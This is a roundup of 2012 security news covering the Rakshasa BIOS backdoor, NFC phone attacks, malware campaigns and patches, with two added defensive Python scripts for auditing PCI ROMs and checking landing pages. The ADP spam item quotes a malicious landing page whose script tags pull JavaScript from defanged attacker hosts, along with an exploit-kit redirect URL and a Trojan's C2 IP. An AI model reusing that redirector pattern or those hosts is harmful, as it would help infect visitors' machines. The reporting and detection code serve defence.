Researcher demonstrates highly persistent hardware backdoor


Spurred by the conclusion of a recent report that, since China is the de facto manufacturer of most IT equipment in the world, it could easily backdoor any computer well before it is shipped to its buyers, security researcher Jonathan Brossard decided to prove the practicality of such backdooring.

He set out to create a backdoor that is persistent, stealthy, portable and cheap, that allows remote updates and provides remote access, and whose creation and deployment cannot be attributed to any individual or state.

The result was Rakshasa ("demon" in Hindu mythology), a proof-of-concept malware that is able both to replace a computer's motherboard BIOS and to infect the firmware embedded in other peripheral devices through PCI expansion ROMs, thus ensuring its stealth and persistence even if the BIOS is later reflashed.

The malware is based on free and open source software, making it harder for antivirus solutions to detect, cheap, and, given that its source code is available to anyone on the Internet, not attributable.

Because current computer architecture allows, for example, the firmware of a PCI CD-ROM device to control a PCI network card, and peripheral devices to access RAM directly, even if the original motherboard BIOS is restored at some point, the rogue firmware on one of those peripherals can be used to reinstall the rogue BIOS.

This means that for the computer to be effectively cleaned, the original BIOS must be restored and all the peripherals reflashed simultaneously, which is not something typical users know how to do or are able to do.

Brossard says that the backdoor can be easily added to the hardware when the attacker has physical access to it, and that in the great majority of cases, the remote attack method is also successful.

Rakshasa consists of a custom version of Coreboot as the BIOS backend, a custom SeaBIOS BIOS payload, a set of PCI expansion ROMs, and a custom active bootkit that is retrieved from the network.

This bootkit is not written to the hard disk's Master Boot Record but is loaded remotely into RAM on each boot, making it both practically impossible to detect and easy to unload from memory once it has done what it set out to do, i.e. modify the kernel.

Unfortunately, says Brossard, computer architecture cannot be changed to prevent this type of attack without breaking backward compatibility, so the only remaining way to prevent backdoored hardware from being delivered is to include PCI ROMs and BIOS firmware in security audits before use.
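As an added example, not from Brossard's paper or this article, here is the kind of defender-side check the audit above calls for: hash each PCI device's expansion ROM as exposed through Linux sysfs and compare it with a known-good baseline. The sysfs layout (/sys/bus/pci/devices/*/rom, enabled by writing "1") is real and needs root; the device tree, vendor/device IDs and ROM bytes in run_demo() are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

ROM_SIGNATURE = b"\x55\xaa"  # every PCI expansion ROM image starts with these two bytes

def read_option_rom(dev_dir, enable=True):
    """Read a device's expansion ROM via its sysfs 'rom' attribute (on real sysfs it
    must be enabled by writing '1' first; enable=False skips that for run_demo())."""
    rom = dev_dir / "rom"
    if not rom.exists():
        return None  # device exposes no expansion ROM
    try:
        if enable:
            rom.write_text("1")
        data = rom.read_bytes()
        if enable:
            rom.write_text("0")
        return data
    except OSError:
        return None  # not readable (needs root, or the device refuses)

def audit_option_roms(sysfs_root, baseline, enable=True):
    """Hash each ROM under sysfs_root (e.g. /sys/bus/pci/devices) against a baseline."""
    findings = []
    for dev_dir in sorted(Path(sysfs_root).iterdir()):
        data = read_option_rom(dev_dir, enable)
        if data is None:
            continue
        key = (dev_dir / "vendor").read_text().strip() + ":" + (dev_dir / "device").read_text().strip()
        if data[:2] != ROM_SIGNATURE:
            findings.append((dev_dir.name, key, "bad ROM signature"))
        expected = baseline.get(key)
        if expected is None:
            findings.append((dev_dir.name, key, "no baseline"))
        elif expected != hashlib.sha256(data).hexdigest():
            findings.append((dev_dir.name, key, "ROM hash mismatch"))
    return findings

def run_demo():
    """Constructed tree (made-up IDs): two same-model cards, one ROM modified, one device without ROM."""
    good_rom = ROM_SIGNATURE + b"\x00" * 30
    tampered = good_rom[:4] + b"\x90" + good_rom[5:]  # one patched byte, signature intact
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, rom in (("0000:00:03.0", good_rom), ("0000:00:04.0", tampered)):
            dev = root / name
            dev.mkdir()
            (dev / "vendor").write_text("0x8086\n")
            (dev / "device").write_text("0x100e\n")
            (dev / "rom").write_bytes(rom)
        (root / "0000:00:05.0").mkdir()  # no 'rom' attribute at all
        baseline = {"0x8086:0x100e": hashlib.sha256(good_rom).hexdigest()}
        return audit_option_roms(root, baseline, enable=False)
```

A real baseline would be recorded from freshly received hardware and re-checked after each firmware change; the same approach extends to the BIOS image itself once it is dumped with a flashing tool.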

For more specific information about the malware and its capabilities, check out Brossard's paper.

Hackers who stole 8.7 million mobile customers data arrested by South Korean police


South Korean police have arrested two malicious hackers who compromised the personal data of 8.7 million customers of KT Telecom, the second biggest mobile carrier in South Korea.

The company alerted police on July 13 after detecting traces of hacking attacks. The data had been collected over the previous five months, starting in February 2012.

Hackers had stolen data such as customers' names, phone numbers and residential registration numbers and sold the information to telemarketing firms.

"It took nearly seven months to develop the hacking program and (the suspects) had very sophisticated hacking skills," a KT Corp. spokesperson told Yonhap News. "In light of this incident, we will strengthen the internal security system and raise awareness of security among all employees to prevent causing inconvenience to customers."

Seven other people were also booked for buying the leaked data for telemarketing purposes, Yonhap said.

The attack, described as one of the country's largest hacking schemes, is estimated to be valued at six figures: police said the two made about 1 billion won ($878,000).

"We deeply bow our head in apology for having your precious personal information leaked... we'll try our best to make such things never happen again," KT said in a statement to customers.

BackTrack 5 R3 will be released on Aug 13th, 2012 - BT5 R3


The BackTrack development team plans to release an R3 revision of the BackTrack penetration testing distribution in two weeks.

According to the official statement, the new release focuses on bug fixes and over 50 new tool additions, making it the most potent revision yet.

"We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags."

"The DVD contains a BT5 R3 Gnome, 32 bit edition – burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012."

Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August.

NFC Hack: Be very careful what your smartphone gets near


Security researcher Charlie Miller set the Black Hat cybersecurity conference buzzing on Wednesday with a presentation showing off newly discovered vulnerabilities in the "near field communications" features of Samsung and Nokia devices.

Near field communication (NFC) is a set of standards for smartphones and similar devices to establish radio communication with each other by touching them together or bringing them into close proximity, usually no more than a few centimetres. Present and anticipated applications include contactless transactions, data exchange, and simplified setup of more complex communications such as Wi-Fi. Communication is also possible between an NFC device and an unpowered NFC chip, called a "tag".

During his presentation, Mr Miller showed how to attack three separate phones: the Samsung Nexus S, the Google Galaxy Nexus - which both run Android - and the Nokia N9, which runs on the MeeGo system.

To attack the phones, Mr Miller wrote software to control a reader tag that works in conjunction with NFC. As its name implies, NFC works when devices are brought close together or are placed near a reader chip.

In one demo Mr Miller piped commands through his custom-built chip that abused a feature of the smartphones known as Android Beam. This allows phone owners to send links and information over short distances to other handsets.

He discovered that the default setting in Android Beam forces a handset to visit any weblink or open any file sent to it. Via this route he forced handsets to visit websites that ran code written to exploit known vulnerabilities in Android.

"The fact that, without you doing anything, all of a sudden your browser is going to my website, is not ideal," Mr Miller said.

In one demonstration using this attack Mr Miller was able to view files on a target handset.

On the Nokia phone, Mr Miller demonstrated how to abuse NFC and take complete control of a target handset, making it send texts or make calls, via the weaknesses exploited by his customised radio tag.

Mr Miller said that to successfully attack the Android phones they must be running a particular version of the operating system, be unlocked and have their screen active.

Nokia said it was aware of Mr Miller's research and said it was "actively investigating" his claims of success against its N9 phone. It said it was not aware of anyone else abusing loopholes via NFC.

Google has yet to comment on the research.

Keith Alexander, NSA Chief, asks hackers to make internet more secure

National Security Agency Director Gen. Keith Alexander, also the head of the U.S. Cyber Command, took the unprecedented step on Friday of asking a convention of unruly hackers to join him in an effort to make the Internet more secure.

In a speech to the 20th annual Def Con gathering in Las Vegas, four-star General Keith Alexander stressed common ground between U.S. officials and hackers, telling them privacy must be preserved and that they could help by developing new tools.

"You're going to have to come in and help us," Alexander told thousands of attendees.

The conference founder, Jeff Moss, known in hacking circles as the Dark Tangent, told the conference he had invited Alexander, who rarely gives speeches, because he wanted them to learn about one of the world's "spookiest, least known" organisations.

Attendees were respectful and gave modest applause, though several said they were concerned about secret government snooping and the failure of authorities thus far to stop foreign-backed attacks.

"Americans pay taxes so that federal agencies can defend them," said a researcher who asked not to be named. "I see it as a hard sell asking a business entity to spend money for the common good."

Alexander won points by wearing the hacker "uniform" of jeans and a T-shirt, wandering the halls and praising specific hacking efforts, including intrusion detection tools and advances in cryptology.

He also confronted civil liberties concerns that are a major issue for many researchers devoted to the internet.

Taking questions screened by Moss, Alexander denied that the NSA had dossiers on millions of Americans, as some former employees have suggested.

"The people who would say we are doing that should know better," he said. "That is absolute nonsense."

Alexander used the speech to lobby for a cyber security bill moving through the Senate that would make it easier for companies under attack to share information with the government and each other as well as give critical infrastructure owners some reward for adhering to future security standards.

"Both parties see this as a significant problem," he said, adding that the experts like those at Def Con should help in the process. "What are the standards that we should jointly set that critical networks should have?"

In addition to conducting electronic intelligence gathering, primarily overseas, the defence-department-controlled NSA is charged with protecting the American army from cyber-attacks.

Increasingly, it has been sharing its findings with the FBI to aid in criminal cases and with the department of homeland security, which warns specific industries of new threats.

Displaying a slide with the logos of several dozen companies breached by criminals or spies in the past two years, Alexander said only the most competent even knew they had been hacked.

"There are 10 times, almost 100 times more companies that don't know they have been hacked," he said.

Wireshark released version 1.8.1 and 1.6.9 to close critical vulnerability


The Wireshark team has released versions 1.8.1 and 1.6.9 to close important vulnerabilities in its open source network protocol analyser.

The vulnerabilities are a problem in the Point-to-Point Protocol (PPP) dissector that leads to a crash, and a bug in the Network File System (NFS) dissector that could result in excessive consumption of CPU resources. To take advantage of the holes, an attacker must inject a malformed packet onto the wire or convince a victim to read a malformed packet trace file.

Versions 1.4.0 to 1.4.13, 1.6.0 to 1.6.8 and 1.8.0 are affected; users are advised to upgrade to 1.6.9 or 1.8.1 to fix the problem.

Wireshark 1.6.9 and 1.8.1 are available for download.

Data-stealing Trojan masquerades as Android battery app


An Android application lures users with the promise of better battery performance upon installation, but it is a Trojan. The Trojan covertly scans the address book and sends phone numbers and email addresses to an attacker-controlled domain.

After sending all contact details, it displays an image with a GONE visibility state (i.e. hidden from the layout), followed by a message in Chinese that translates as "I am sorry. Your terminal is not available or unsupported."

Users then believe the app really isn’t compatible with their handset and usually uninstall it, believing nothing happened.

"Although the message is in Chinese, the Trojan is perfectly capable of infecting any Android-running device and scan address books regardless of region or carrier," a BitDefender researcher says.

The application does nothing to improve battery performance and users are left believing their device was simply incompatible with the app. Even the app’s icon is pretty convincing, displaying a green battery logo.

Apple released Safari v6.0 that addresses numerous security vulnerabilities

Alongside the release of OS X 10.8 Mountain Lion earlier today, Apple has published version 6.0 of its Safari web browser for OS X 10.7 Lion, adding a number of new features and closing numerous security holes.

According to the company, the major update addresses more than 120 vulnerabilities found in the previous 5.x branch.

Among the holes closed are problems in the handling of feed:// URLs that could have led to cross-site scripting (XSS) attacks or users' files being sent to a remote server. A bug in the autocomplete system used by Safari, which may have resulted in passwords being automatically inserted even when a site specifies that they shouldn't be, has been fixed, as has an XSS issue caused by opening maliciously crafted files on certain pages.

A full list of security fixes can be found in Apple's security advisory. Users running Mac OS X 10.7.4 can upgrade to Safari 6 using the built-in Software Update function. All users are advised to upgrade as soon as possible.

ADP Notification mail leads to BlackHole Exploit Kit

Researchers at MX Lab have started intercepting a spam campaign that masquerades as ADP notification mail. The intercepted mails have subjects such as "ADP Funding Notification" and "ADP Security Management Update".

The email is sent from the spoofed address ADPClientServices@adp.com, though the sender address may vary.

The content of one of the intercepted spam mails:

Your Transaction Report(s) have been uploaded to the web site:
https://www.flexdirect.adp.com/client/login.aspx
Please note that your bank account will be debited within one banking
business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any
questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
Once the user clicks the link in the spam mail, they are taken to a website containing the following script:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://cyberku.co.cc/s8XVniQE/js.js"></script>
<script type="text/javascript" src="hxxp://maccvision.com/vS5qA1sz/js.js"></script>
</html>
Both JavaScript files contain the same script, which redirects the visitor to 'hxxp://216.119.142.129/view.php?s=7058dba9af062ccf'. That URL hosts the BlackHole exploit kit, which uses plugin version 0.7.8 (the latest version of the BlackHole exploit kit).

The BlackHole exploit kit tries to take advantage of vulnerabilities present on the victim's system. After successful exploitation, it downloads a malicious file called 'info.exe'. The detection ratio of this malware is 2/42 (VirusTotal).
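The landing page quoted above has a recognisable shape: almost no visible content, and script tags pulling from hosts other than the page's own. As an added example, not from the MX Lab write-up, here is a small Python checker that parses such a page, collects the external script hosts and flags the page; the HTML is a constructed copy of the snippet above (URLs left defanged) and the page host "landing.example" is an assumed placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed copy of the redirector page quoted above; URLs stay defanged (hxxp).
LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://cyberku.co.cc/s8XVniQE/js.js"></script>
<script type="text/javascript" src="hxxp://maccvision.com/vS5qA1sz/js.js"></script>
</html>"""


class ScriptSrcParser(HTMLParser):
    """Collects <script src> values and the page's visible (non-script) text."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.text_parts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.script_srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script and data.strip():
            self.text_parts.append(data.strip())


def refang(url):
    """Turn a defanged hxxp:// URL back into http:// so urlparse sees a scheme."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def analyse_landing_page(html, page_host):
    """Flag a page that shows almost nothing while loading scripts from other hosts."""
    parser = ScriptSrcParser()
    parser.feed(html)
    hosts = (urlparse(refang(s)).hostname for s in parser.script_srcs)
    external = [h for h in hosts if h and h.lower() != page_host.lower()]
    visible = " ".join(parser.text_parts)
    return {
        "external_script_hosts": external,
        "visible_text": visible,
        "suspicious": bool(external) and len(visible) < 40,  # assumed threshold
    }
```

The external hosts are what a defender would feed into proxy or DNS logs to find other users who fetched the same redirector scripts.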

Facebook virus: Citadel targets Facebook Users with Children’s Charity Scam


Security researchers from Trusteer have discovered a new variant of the Citadel malware that injects itself into your Facebook web pages and demands that you make a donation to a fake charity for sick children.

After users have logged into their Facebook account, the Citadel injection mechanism displays a pop-up that encourages the victim to donate $1 to children who "desperately" need humanitarian aid. Next, it asks for your name, credit card number, expiration date, CVV, and security password.

What makes this attack particularly sophisticated is that the malware is configured to deliver the attack based on the user's country/language settings, with web-injection pages in five different languages: English, Italian, Spanish, German and Dutch.

In an interesting twist, the criminals do not reuse the same text for every language. Instead, they have customized each attack based on the victim’s country and/or region.

"This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children’s charities as a scam makes this attack believable and effective," a Trusteer spokesperson wrote.

"Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale."

New Mac Trojan called OSX/Crisis discovered by Intego



Mac security firm Intego has discovered a new Mac OS X Trojan referred to as OSX/Crisis. The malware installs itself without user interaction and does not need your user password to infect your Apple Mac.

The threat only works on the two latest versions of Mac OS X, Snow Leopard and Lion.

The Trojan preserves itself against reboots, so it will continue to run until it’s removed. Depending on whether or not the dropper runs on a user account with Admin permissions, it will install different components.

If the dropper runs on a system with Admin permissions, it will drop a rootkit to hide itself. In either case, it creates a number of files and folders to complete its tasks. It creates 17 files when it’s run with Admin permissions, 14 files when it’s run without. Many of these are randomly named, but there are some that are consistent.

  • With or without Admin permissions, this folder is created:
    • /Library/ScriptingAdditions/appleHID/
  • Only with Admin permissions, this folder is created:
    • /System/Library/Frameworks/Foundation.framework/XPCServices/

Once installed, OSX/Crisis calls home to IP address 176.58.100.37 every five minutes, presumably to await instructions.

Here's where it gets interesting. "The file is created in a way that is intended to make reverse engineering tools more difficult to use when analyzing the file," an Intego spokesperson said in a statement. "This sort of anti-analysis technique is common in Windows malware, but is relatively uncommon for OS X malware."